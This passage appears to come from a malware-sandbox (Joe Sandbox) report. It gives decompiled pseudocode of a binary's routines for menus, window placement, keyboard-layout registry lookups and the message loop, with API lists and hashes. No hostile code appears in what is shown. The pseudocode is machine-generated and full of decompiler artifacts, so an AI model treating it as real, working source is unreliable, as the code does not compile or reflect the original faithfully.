                                  								InsertMenuA(_t176, 0xffffffff, _t180 | 0x00000010, E004459AC(_t152), _t108);
                                  							}
                                  							goto L22;
                                  						}
                                  						_v58.cbSize = 0x2c;
                                  						_v58.fMask = 0x3f;
                                  						_t182 = E00447A20(_t152);
                                  						if(_t182 == 0 ||  *((char*)(_t182 + 0x40)) == 0 && E00447034(_t152) == 0) {
                                  							if( *((intOrPtr*)(_t152 + 0x4c)) == 0) {
                                  								L14:
                                  								_t114 = 0;
                                  								goto L16;
                                  							}
                                  							_t195 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x4c)))) + 0x1c))();
                                  							if(_t195 == 0) {
                                  								goto L15;
                                  							}
                                  							goto L14;
                                  						} else {
                                  							L15:
                                  							_t114 = 1;
                                  							L16:
                                  							_v10 = _t114;
                                  							_v58.fType =  *(0x46eef4 + ((E00404528( *((intOrPtr*)(_t152 + 0x30)), 0x44571c) & 0xffffff00 | _t195 == 0x00000000) & 0x0000007f) * 4) |  *(0x46eeec + ( *(_t152 + 0x3d) & 0x000000ff) * 4) |  *(0x46eec8 + ( *(_t152 + 0x48) & 0x000000ff) * 4) |  *(0x46eefc + (_v9 & 0x000000ff) * 4) |  *(0x46ef04 + (_v10 & 0x000000ff) * 4);
                                  							_v58.fState =  *(0x46eed4 + ( *(_t152 + 0x38) & 0x000000ff) * 4) |  *(0x46eee4 + ( *(_t152 + 0x39) & 0x000000ff) * 4) |  *(0x46eedc + ( *(_t152 + 0x3a) & 0x000000ff) * 4);
                                  							_v58.wID =  *(_t152 + 0x50) & 0x0000ffff;
                                  							_v58.hSubMenu = 0;
                                  							_v58.hbmpChecked = 0;
                                  							_v58.hbmpUnchecked = 0;
                                  							_v58.dwTypeData = E004045DC(_v8);
                                  							if(E00447460(_t152) > 0) {
                                  								_v58.hSubMenu = E004459AC(_t152);
                                  							}
                                  							InsertMenuItemA(_t176, 0xffffffff, 0xffffffff,  &_v58);
                                  							goto L22;
                                  						}
                                  					}
                                  					_t183 =  *((intOrPtr*)(_t152 + 0x64));
                                  					__eflags = _t183;
                                  					if(_t183 == 0) {
                                  						L7:
                                  						_push(_v8);
                                  						_push(0x445710);
                                  						E00444AE8( *(_t152 + 0x60) & 0x0000ffff, _t152, _t153,  &_v64, _t183);
                                  						_push(_v64);
                                  						E0040449C();
                                  						goto L8;
                                  					}
                                  					__eflags =  *((intOrPtr*)(_t183 + 0x64));
                                  					if( *((intOrPtr*)(_t183 + 0x64)) != 0) {
                                  						goto L7;
                                  					}
                                  					_t174 =  *0x444374; // 0x4443c0
                                  					_t147 = E00403524( *((intOrPtr*)(_t183 + 4)), _t174);
                                  					__eflags = _t147;
                                  					if(_t147 != 0) {
                                  						goto L8;
                                  					}
                                  					goto L7;
                                  				}
                                  				_v58.hSubMenu = E004459AC(_t152);
                                  				goto L8;
                                  			}

                                  APIs
                                  • GetVersion.KERNEL32(00000000,004456F9), ref: 00445544
                                  • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0044564D
                                    • Part of subcall function 004459AC: CreatePopupMenu.USER32(?,004456B5,00000000,00000000,004456F9), ref: 004459C7
                                  • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004456D6
                                    • Part of subcall function 004459AC: CreateMenu.USER32(?,004456B5,00000000,00000000,004456F9), ref: 004459D1
                                  • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004456BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Menu$Insert$Create$ItemPopupVersion
                                  • String ID: ,$?
                                  • API String ID: 2359071979-2308483597
                                  • Opcode ID: c67b352ac6dc60bb7ae42a4ee4d90cf118caf41a0ea880b20f70d63534e4a80f
                                  • Instruction ID: 74c3d08c6581f6807fd89a35689f61f32990ddafc1d6edc0ee199db7c4b24ff9
                                  • Opcode Fuzzy Hash: c67b352ac6dc60bb7ae42a4ee4d90cf118caf41a0ea880b20f70d63534e4a80f
                                  • Instruction Fuzzy Hash: B661CF70A04654ABEF10EF6AD88166A7BF5AF46304B44447BF940AA3A7E73CDD01CB19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 70%
                                  			E0043D1AC(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr* _v8;
                                  				void _v12;
                                  				intOrPtr _v16;
                                  				int _v24;
                                  				int _v28;
                                  				intOrPtr _v32;
                                  				char _v36;
                                  				intOrPtr* _t80;
                                  				intOrPtr _t91;
                                  				void* _t118;
                                  				signed char _t119;
                                  				intOrPtr _t135;
                                  				intOrPtr _t144;
                                  				void* _t147;
                                  
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				_t118 = __ecx;
                                  				_v8 = __eax;
                                  				_t144 =  *0x46fda0; // 0x470b44
                                  				 *((char*)(_v8 + 0x228)) = 1;
                                  				_push(_t147);
                                  				_push(0x43d387);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t147 + 0xffffffe0;
                                  				E00434BB4(_v8, __ecx, __ecx, _t144);
                                  				_v16 = _v16 + 4;
                                  				E00435E8C(_v8,  &_v28);
                                  				if(E00453AAC() <  *(_v8 + 0x4c) + _v24) {
                                  					_v24 = E00453AAC() -  *(_v8 + 0x4c);
                                  				}
                                  				if(E00453AB8() <  *(_v8 + 0x48) + _v28) {
                                  					_v28 = E00453AB8() -  *(_v8 + 0x48);
                                  				}
                                  				if(E00453AA0() > _v28) {
                                  					_v28 = E00453AA0();
                                  				}
                                  				if(E00453A94() > _v16) {
                                  					_v16 = E00453A94();
                                  				}
                                  				SetWindowPos(E0043BA58(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
                                  				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x22c)) > 0xfa && E004043DC(_t118) < 0x64 &&  *0x46ecec != 0) {
                                  					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
                                  					if(_v12 != 0) {
                                  						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
                                  						if(_v12 == 0) {
                                  							E00440938( &_v36);
                                  							if(_v32 <= _v24) {
                                  								_t119 = 1;
                                  							} else {
                                  								_t119 = 0;
                                  							}
                                  						} else {
                                  							_t119 = 2;
                                  						}
                                  						 *0x46ecec(E0043BA58(_v8), 0x64,  *(0x46edf4 + (_t119 & 0x000000ff) * 4) | 0x00040000);
                                  					}
                                  				}
                                  				_t80 =  *0x46fc50; // 0x470b40
                                  				E00438CC8(_v8,  *((intOrPtr*)( *_t80 + 0x30)));
                                  				ShowWindow(E0043BA58(_v8), 4);
                                  				 *((intOrPtr*)( *_v8 + 0x80))();
                                  				_pop(_t135);
                                  				 *[fs:eax] = _t135;
                                  				_push(0x43d38e);
                                  				 *((intOrPtr*)(_v8 + 0x22c)) = GetTickCount();
                                  				_t91 = _v8;
                                  				 *((char*)(_t91 + 0x228)) = 0;
                                  				return _t91;
                                  			}


















                                  APIs
                                  • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,0043D387), ref: 0043D291
                                  • GetTickCount.KERNEL32 ref: 0043D296
                                  • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 0043D2D1
                                  • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0043D2E9
                                  • AnimateWindow.USER32(00000000,00000064,?), ref: 0043D32E
                                  • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,0043D387), ref: 0043D351
                                  • GetTickCount.KERNEL32 ref: 0043D36E
                                    • Part of subcall function 00440938: GetCursorPos.USER32(?), ref: 0044093C
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                  • String ID:
                                  • API String ID: 3024527889-0
                                  • Opcode ID: 9d9a8a5f78f9b11540d033f4340f7ce0bca38c5b49737c3dc1b283e8e931efdd
                                  • Instruction ID: fcb178054d70579c5305c7faf103e6b77a2914487e238d35651c27c8870d5e55
                                  • Opcode Fuzzy Hash: 9d9a8a5f78f9b11540d033f4340f7ce0bca38c5b49737c3dc1b283e8e931efdd
                                  • Instruction Fuzzy Hash: D6515C34A00109EFDB10EFA9D986A9EB7F4EF48304F2051A6F940EB351D778AE44CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 004579D8: GetActiveWindow.USER32 ref: 004579FF
                                  • GetWindowRect.USER32 ref: 00456652
                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0045668A
                                  • MessageBoxA.USER32 ref: 004566C9
                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045673F,?,00000000,00456738), ref: 00456719
                                  • SetActiveWindow.USER32(00000000,0045673F,?,00000000,00456738), ref: 0045672A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$Active$MessageRect
                                  • String ID: (
                                  • API String ID: 3147912190-3887548279
                                  • Opcode ID: baeebc2037105bebb5a264d65a99cc5d457036e15943cdfc2575cd948c55bd71
                                  • Instruction ID: 03e1060d66c5c51507ac80292a07efda75e99edb015607856b5e8fcb500629f0
                                  • Opcode Fuzzy Hash: baeebc2037105bebb5a264d65a99cc5d457036e15943cdfc2575cd948c55bd71
                                  • Instruction Fuzzy Hash: 1E513AB5A00108AFDB00DBE9DD91FAEB7F8FB48305F55446AF900EB392D678AD048B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E00453CFC(intOrPtr __eax, void* __ebx, void* __fp0) {
                                  				intOrPtr _v8;
                                  				int _v12;
                                  				void* _v16;
                                  				char _v20;
                                  				void* _v24;
                                  				struct HKL__* _v280;
                                  				char _v536;
                                  				char _v600;
                                  				char _v604;
                                  				char _v608;
                                  				char _v612;
                                  				void* _t60;
                                  				intOrPtr _t106;
                                  				intOrPtr _t111;
                                  				void* _t117;
                                  				void* _t118;
                                  				intOrPtr _t119;
                                  				void* _t129;
                                  
                                  				_t129 = __fp0;
                                  				_t117 = _t118;
                                  				_t119 = _t118 + 0xfffffda0;
                                  				_v612 = 0;
                                  				_v8 = __eax;
                                  				_push(_t117);
                                  				_push(0x453ea7);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t119;
                                  				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
                                  					L11:
                                  					_pop(_t106);
                                  					 *[fs:eax] = _t106;
                                  					_push(0x453eae);
                                  					return E0040411C( &_v612);
                                  				} else {
                                  					 *((intOrPtr*)(_v8 + 0x34)) = E00403368(1);
                                  					E0040411C(_v8 + 0x38);
                                  					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
                                  					if(_t60 < 0) {
                                  						L10:
                                  						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x25)) = 0;
                                  						E00415A34( *((intOrPtr*)(_v8 + 0x34)), 1);
                                  						goto L11;
                                  					} else {
                                  						_v20 = _t60 + 1;
                                  						_v24 =  &_v280;
                                  						do {
                                  							if(E00440DA4( *_v24) == 0) {
                                  								goto L9;
                                  							} else {
                                  								_v608 =  *_v24;
                                  								_v604 = 0;
                                  								if(RegOpenKeyExA(0x80000002, E00408EF4( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
                                  									goto L9;
                                  								} else {
                                  									_push(_t117);
                                  									_push(0x453e63);
                                  									_push( *[fs:eax]);
                                  									 *[fs:eax] = _t119;
                                  									_v12 = 0x100;
                                  									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
                                  										E0040438C( &_v612, 0x100,  &_v536);
                                  										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
                                  										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
                                  											E0040438C(_v8 + 0x38, 0x100,  &_v536);
                                  										}
                                  									}
                                  									_pop(_t111);
                                  									 *[fs:eax] = _t111;
                                  									_push(0x453e6a);
                                  									return RegCloseKey(_v16);
                                  								}
                                  							}
                                  							goto L12;
                                  							L9:
                                  							_v24 = _v24 + 4;
                                  							_t38 =  &_v20;
                                  							 *_t38 = _v20 - 1;
                                  						} while ( *_t38 != 0);
                                  						goto L10;
                                  					}
                                  				}
                                  				L12:
                                  			}






















                                  APIs
                                  • GetKeyboardLayoutList.USER32(00000040,?,00000000,00453EA7,?,00000000,?,00453F09,00000000,?,00437273), ref: 00453D52
                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00453DBA
                                  • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,00453E63,?,80000002,00000000), ref: 00453DF4
                                  • RegCloseKey.ADVAPI32(?,00453E6A,00000000,?,00000100,00000000,00453E63,?,80000002,00000000), ref: 00453E5D
                                  Strings
                                  • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00453DA4
                                  • layout text, xrefs: 00453DEB
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CloseKeyboardLayoutListOpenQueryValue
                                  • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                  • API String ID: 1703357764-2652665750
                                  • Opcode ID: 4224ee4b62b2ee05c33a1dc4bc5c3429725c5e52e80da33e0a0958a3a6363b84
                                  • Instruction ID: 86c4c94e0474dfddcbcfd8384168408c5acf329df256b04f42af95032648c71e
                                  • Opcode Fuzzy Hash: 4224ee4b62b2ee05c33a1dc4bc5c3429725c5e52e80da33e0a0958a3a6363b84
                                  • Instruction Fuzzy Hash: B1416D74A002099FDB11DF95C982BDEB7F8EB48705F5040A6E904EB392D778AF44CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E0045613C(void* __eax, char* __ecx, struct tagMSG* __edx) {
                                  				char _v19;
                                  				char _t12;
                                  				int _t13;
                                  				void* _t14;
                                  				int _t30;
                                  				int _t32;
                                  				MSG* _t42;
                                  				void* _t43;
                                  				char* _t45;
                                  
                                  				_t33 = __ecx;
                                  				_push(__ecx);
                                  				_t42 = __edx;
                                  				_t43 = __eax;
                                  				_t32 = 0;
                                  				if(PeekMessageA(__edx, 0, 0, 0, 0) != 0) {
                                  					 *_t45 = _t12;
                                  					if( *_t45 == 0) {
                                  						_t13 = PeekMessageA(_t42, 0, 0, 0, 1);
                                  						asm("sbb eax, eax");
                                  						_t14 = _t13 + 1;
                                  					} else {
                                  						_t30 = PeekMessageW(_t42, 0, 0, 0, 1);
                                  						asm("sbb eax, eax");
                                  						_t14 = _t30 + 1;
                                  					}
                                  					if(_t14 != 0) {
                                  						_t32 = 1;
                                  						if(_t42->message == 0x12) {
                                  							 *((char*)(_t43 + 0xa4)) = 1;
                                  						} else {
                                  							_v19 = 0;
                                  							if( *((short*)(_t43 + 0x102)) != 0) {
                                  								_t33 =  &_v19;
                                  								 *((intOrPtr*)(_t43 + 0x100))();
                                  							}
                                  							if(E00457BB4(_t43, _t33, _t42) == 0 && E00456000(_t43, _t42) == 0 && _v19 == 0 && E00455EF8(_t43, _t42) == 0 && E00455F48(_t43, _t33, _t42) == 0 && E00455ED4(_t43, _t42) == 0) {
                                  								TranslateMessage(_t42);
                                  								if( *_t45 == 0) {
                                  									DispatchMessageA(_t42);
                                  								} else {
                                  									DispatchMessageW(_t42);
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t32;
                                  			}













                                  APIs
                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00456150
                                  • IsWindowUnicode.USER32 ref: 00456164
                                  • PeekMessageW.USER32 ref: 00456185
                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0045619B
                                  • TranslateMessage.USER32 ref: 00456224
                                  • DispatchMessageW.USER32 ref: 00456230
                                  • DispatchMessageA.USER32 ref: 00456238
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                  • String ID:
                                  • API String ID: 2190272339-0
                                  • Opcode ID: 2aa04e25466a50641bf453fa97dfb48c568b1f1bbc39b2ea5547bc5fb7e1b9df
                                  • Instruction ID: f3296ffb22f40036ad4d1b2552db24988b935ea516c4903b01a3ba2daeff3033
                                  • Opcode Fuzzy Hash: 2aa04e25466a50641bf453fa97dfb48c568b1f1bbc39b2ea5547bc5fb7e1b9df
                                  • Instruction Fuzzy Hash: 85210C3130474026EA3176290E42B7F52954F9174BF5684AFFD81A73C3D6AD988E411E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 70%
                                  			E00421764(void* __eax, void* __edx, void* __fp0) {
                                  				BYTE* _v8;
                                  				int _v12;
                                  				struct HDC__* _v16;
                                  				short _v18;
                                  				signed int _v24;
                                  				short _v26;
                                  				short _v28;
                                  				char _v38;
                                  				void* __ebx;
                                  				void* __ebp;
                                  				signed int _t35;
                                  				struct HDC__* _t43;
                                  				void* _t65;
                                  				intOrPtr _t67;
                                  				intOrPtr _t77;
                                  				void* _t80;
                                  				void* _t83;
                                  				void* _t85;
                                  				intOrPtr _t86;
                                  
                                  				_t83 = _t85;
                                  				_t86 = _t85 + 0xffffffdc;
                                  				_t80 = __edx;
                                  				_t65 = __eax;
                                  				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
                                  					return __eax;
                                  				} else {
                                  					E00402D4C( &_v38, 0x16);
                                  					_t67 =  *((intOrPtr*)(_t65 + 0x28));
                                  					_v38 = 0x9ac6cdd7;
                                  					_t35 =  *(_t67 + 0x18) & 0x0000ffff;
                                  					if(_t35 != 0) {
                                  						_v24 = _t35;
                                  					} else {
                                  						_v24 = 0x60;
                                  					}
                                  					_v28 = MulDiv( *(_t67 + 0xc), _v24 & 0x0000ffff, 0x9ec);
                                  					_v26 = MulDiv( *(_t67 + 0x10), _v24 & 0x0000ffff, 0x9ec);
                                  					_t43 = E0041FA3C( &_v38);
                                  					_v18 = _t43;
                                  					_push(0);
                                  					L004066E4();
                                  					_v16 = _t43;
                                  					_push(_t83);
                                  					_push(0x42189f);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t86;
                                  					_v12 = GetWinMetaFileBits( *(_t67 + 8), 0, 0, 8, _v16);
                                  					_v8 = E004026E4(_v12);
                                  					_push(_t83);
                                  					_push(0x42187f);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t86;
                                  					if(GetWinMetaFileBits( *(_t67 + 8), _v12, _v8, 8, _v16) < _v12) {
                                  						E0041EC2C(_t67);
                                  					}
                                  					E00415DA8(_t80, 0x16,  &_v38);
                                  					E00415DA8(_t80, _v12, _v8);
                                  					_pop(_t77);
                                  					 *[fs:eax] = _t77;
                                  					_push(0x421886);
                                  					return E00402704(_v8);
                                  				}
                                  			}























                                  APIs
                                  • MulDiv.KERNEL32(?,?,000009EC), ref: 004217B6
                                  • MulDiv.KERNEL32(?,?,000009EC), ref: 004217CD
                                  • 72E7AC50.USER32(00000000,?,?,000009EC,?,?,000009EC), ref: 004217E4
                                  • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,0042189F,?,00000000,?,?,000009EC,?,?,000009EC), ref: 00421808
                                  • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,0042187F,?,?,00000000,00000000,00000008,?,00000000,0042189F), ref: 0042183B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: BitsFileMeta
                                  • String ID: `
                                  • API String ID: 858000408-2679148245
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 56%
                                  			E004438DC(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                  				intOrPtr _v8;
                                  				void* __ecx;
                                  				intOrPtr _t9;
                                  				void* _t11;
                                  				intOrPtr _t17;
                                  				void* _t28;
                                  				intOrPtr _t33;
                                  				intOrPtr _t34;
                                  				intOrPtr _t37;
                                  				struct HINSTANCE__* _t41;
                                  				void* _t43;
                                  				intOrPtr _t45;
                                  				intOrPtr _t46;
                                  
                                  				_t45 = _t46;
                                  				_push(__ebx);
                                  				_t43 = __edx;
                                  				_t28 = __eax;
                                  				if( *0x470b28 == 0) {
                                  					 *0x470b28 = E0040C078("comctl32.dll", __eax);
                                  					if( *0x470b28 >= 0x60000) {
                                  						_t41 = GetModuleHandleA("comctl32.dll");
                                  						if(_t41 != 0) {
                                  							 *0x470b2c = GetProcAddress(_t41, "ImageList_WriteEx");
                                  						}
                                  					}
                                  				}
                                  				_v8 = E0041A5EC(_t43, 1, 0);
                                  				_push(_t45);
                                  				_push(0x4439d6);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t46;
                                  				if( *0x470b2c == 0) {
                                  					_t9 = _v8;
                                  					if(_t9 != 0) {
                                  						_t9 = _t9 - 0xffffffec;
                                  					}
                                  					_push(_t9);
                                  					_t11 = E00442818(_t28);
                                  					_push(_t11);
                                  					L0042520C();
                                  					if(_t11 == 0) {
                                  						_t33 =  *0x46fb30; // 0x41b618
                                  						E0040B8EC(_t33, 1);
                                  						E00403B64();
                                  					}
                                  				} else {
                                  					_t17 = _v8;
                                  					if(_t17 != 0) {
                                  						_t17 = _t17 - 0xffffffec;
                                  					}
                                  					_push(_t17);
                                  					_push(1);
                                  					_push(E00442818(_t28));
                                  					if( *0x470b2c() != 0) {
                                  						_t34 =  *0x46fb30; // 0x41b618
                                  						E0040B8EC(_t34, 1);
                                  						E00403B64();
                                  					}
                                  				}
                                  				_pop(_t37);
                                  				 *[fs:eax] = _t37;
                                  				_push(0x4439dd);
                                  				return E00403398(_v8);
                                  			}

                                  APIs
                                    • Part of subcall function 0040C078: 739414E0.VERSION(00000000,?,00000000,0040C14E), ref: 0040C0BA
                                    • Part of subcall function 0040C078: 739414C0.VERSION(00000000,?,00000000,?,00000000,0040C131,?,00000000,?,00000000,0040C14E), ref: 0040C0EF
                                    • Part of subcall function 0040C078: 73941500.VERSION(?,0040C160,?,?,00000000,?,00000000,?,00000000,0040C131,?,00000000,?,00000000,0040C14E), ref: 0040C109
                                  • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00443910
                                  • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 00443921
                                  • 73451DE0.COMCTL32(00000000,?,00000000,004439D6), ref: 004439A0
                                  Similarity
                                  • API ID: 739414$7345173941500AddressHandleModuleProc
                                  • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                  • API String ID: 978676473-3125200627
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 55%
                                  			E00448A54(void* __ebx, void* __esi, void* __eflags) {
                                  				char _v8;
                                  				struct HINSTANCE__* _v12;
                                  				intOrPtr _v16;
                                  				char _v26;
                                  				char _v32;
                                  				char _v36;
                                  				intOrPtr _t64;
                                  				void* _t67;
                                  				void* _t68;
                                  				intOrPtr _t69;
                                  				void* _t70;
                                  
                                  				_t70 = __eflags;
                                  				_t47 = __ebx;
                                  				_t67 = _t68;
                                  				_t69 = _t68 + 0xffffffe0;
                                  				_push(__ebx);
                                  				_v32 = 0;
                                  				_v36 = 0;
                                  				_v8 = 0;
                                  				_push(_t67);
                                  				_push(0x448b89);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t69;
                                  				_v26 = 0;
                                  				GetKeyboardLayoutNameA( &_v26);
                                  				_v16 = E0041B004(1);
                                  				_push(_t67);
                                  				_push(0x448b5f);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t69;
                                  				E0041B0A4(_v16, 0x80000002);
                                  				E0040438C( &_v36, 0xa,  &_v26);
                                  				E00404428( &_v32, _v36, "\\SYSTEM\\CurrentControlSet\\Control\\Keyboard Layouts\\");
                                  				E0041B108(_v16, __ebx, 0, _v32, __esi);
                                  				E0041B45C(_v16,  &_v8, "Layout File", _t70);
                                  				_v12 = E0040D158(_v8, _t47, 0x8000);
                                  				_push(_t67);
                                  				_push(0x448b42);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t69;
                                  				 *0x46ef28 = ( *( *(GetProcAddress(_v12, "KbdLayerDescriptor"))() + 0x28) & 1) == 1;
                                  				_pop(_t64);
                                  				 *[fs:eax] = _t64;
                                  				_push(0x448b49);
                                  				return FreeLibrary(_v12);
                                  			}

                                  APIs
                                  • GetKeyboardLayoutNameA.USER32 ref: 00448A7C
                                    • Part of subcall function 0041B0A4: RegCloseKey.ADVAPI32(10940000,0041AF80,00000001,0041B022,?,?,0042487E,00000008,00000060,00000048,00000000,00424923), ref: 0041B0B8
                                    • Part of subcall function 0041B108: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,0041B20D), ref: 0041B182
                                    • Part of subcall function 0040D158: SetErrorMode.KERNEL32 ref: 0040D162
                                    • Part of subcall function 0040D158: LoadLibraryA.KERNEL32(00000000,00000000,0040D1AC,?,00000000,0040D1CA), ref: 0040D191
                                  • GetProcAddress.KERNEL32(?,KbdLayerDescriptor), ref: 00448B0F
                                  • FreeLibrary.KERNEL32(?,00448B49,?,00000000,00000000,00448B89), ref: 00448B3C
                                  Strings
                                  • KbdLayerDescriptor, xrefs: 00448B06
                                  • \SYSTEM\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 00448AC1
                                  • Layout File, xrefs: 00448ADB
                                  Similarity
                                  • API ID: Library$AddressCloseErrorFreeKeyboardLayoutLoadModeNameOpenProc
                                  • String ID: KbdLayerDescriptor$Layout File$\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
                                  • API String ID: 3365787578-2194312379
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E00421DE8(int __eax, void* __ecx, intOrPtr __edx) {
                                  				intOrPtr _v8;
                                  				int _v12;
                                  				struct HDC__* _v16;
                                  				void* _v20;
                                  				struct tagRGBQUAD _v1044;
                                  				int _t16;
                                  				struct HDC__* _t18;
                                  				int _t31;
                                  				int _t34;
                                  				intOrPtr _t41;
                                  				void* _t43;
                                  				void* _t46;
                                  				void* _t48;
                                  				intOrPtr _t49;
                                  
                                  				_t16 = __eax;
                                  				_t46 = _t48;
                                  				_t49 = _t48 + 0xfffffbf0;
                                  				_v8 = __edx;
                                  				_t43 = __eax;
                                  				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
                                  					L4:
                                  					return _t16;
                                  				} else {
                                  					_t16 = E0041F480(_v8, 0xff,  &_v1044);
                                  					_t34 = _t16;
                                  					if(_t34 == 0) {
                                  						goto L4;
                                  					} else {
                                  						_push(0);
                                  						L004066E4();
                                  						_v12 = _t16;
                                  						_t18 = _v12;
                                  						_push(_t18);
                                  						L00406374();
                                  						_v16 = _t18;
                                  						_v20 = SelectObject(_v16, _t43);
